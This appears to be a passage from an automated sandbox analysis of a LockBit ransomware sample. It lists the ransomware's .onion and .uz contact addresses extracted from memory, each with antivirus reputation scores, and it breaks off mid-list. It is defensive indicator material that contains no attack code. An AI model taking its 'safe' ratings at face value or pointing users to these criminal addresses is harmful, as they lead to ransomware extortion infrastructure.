            http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly0%Avira URL Cloudsafe
            http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly0%Avira URL Cloudsafe
            http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion0%Avira URL Cloudsafe
            http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion0%Avira URL Cloudsafe
            http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion0%Avira URL Cloudsafe
            http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onionFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0%Avira URL Cloudsafe
            http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion0%Avira URL Cloudsafe
            http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion0%Avira URL Cloudsafe
            http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.ly0%Avira URL Cloudsafe
            http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion100%Avira URL Cloudmalware
            http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.ly0%Avira URL Cloudsafe
            http://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion0%Avira URL Cloudsafe
            http://lockbitapt.uz0%Avira URL Cloudsafe
            http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion0%Avira URL Cloudsafe
            https://tox.chat/download.html.0%Avira URL Cloudsafe
            http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion0%Avira URL Cloudsafe
            http://lockbitsupp.uz0%Avira URL Cloudsafe
            http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly0%Avira URL Cloudsafe
            http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly0%Avira URL Cloudsafe
            http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly0%Avira URL Cloudsafe
            http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion0%Avira URL Cloudsafe
            http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly0%Avira URL Cloudsafe
            http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly100%Avira URL Cloudmalware
            http://lockbitsupp.uzFFFFFFFFFFFFFFFFFFFFF0%Avira URL Cloudsafe
            http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion100%Avira URL Cloudmalware
            http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onionFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://twitter.com/hashtag/lockbit?f=livefile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.442393956.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.439820474.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.312771029.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.447425531.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.324046110.000000000092B000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.lyfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.330435997.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289384690.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.313836042.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314463860.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289392712.0000000000925000.00000004.00000020.00020000.00000000.sdmptrue
              • 4%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onionfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289384690.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.293972286.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
              • 4%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.lyRRfile.exe, 00000000.00000003.330435997.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.313836042.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.280542809.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314463860.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289392712.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.277420829.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.307881609.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.313377743.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289322188.0000000000924000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.313452774.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314068740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.329869915.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.288088837.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.276919053.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289232376.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331122880.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.274735127.0000000000924000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.288503161.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.274648765.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.288893518.0000000000924000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.288820564.0000000000923000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd.onionFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFfile.exe, 00000000.00000002.516606433.0000000000720000.00000004.00000001.00040000.00000009.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onionfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.293972286.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.442393956.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.439820474.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onionfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.330435997.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289384690.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.313836042.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314463860.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289392712.0000000000925000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.lyfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.330435997.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.313836042.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.280542809.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314463860.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289392712.0000000000925000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onionfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.293972286.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.442393956.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.439820474.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onionfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289384690.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.293972286.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onionFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFfile.exe, 00000000.00000002.516606433.0000000000720000.00000004.00000001.00040000.00000009.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onionfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289384690.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.293972286.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.lyfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.330435997.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.313836042.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314463860.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289899791.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289392712.0000000000925000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://www.torproject.org/file.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.461967837.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.306751921.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.381960520.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.455654287.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463105254.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.338220772.000000000092A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.457827111.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.464183853.0000000000926000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.375355741.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.442393956.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.439820474.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.312771029.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.447425531.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.324046110.000000000092B000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onionfile.exe, 00000000.00000003.446427926.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.398841290.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.297655508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.328938060.000000000092B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.331818899.000000000092C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.459973831.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.432469046.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.289384690.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.418447745.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.463764199.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 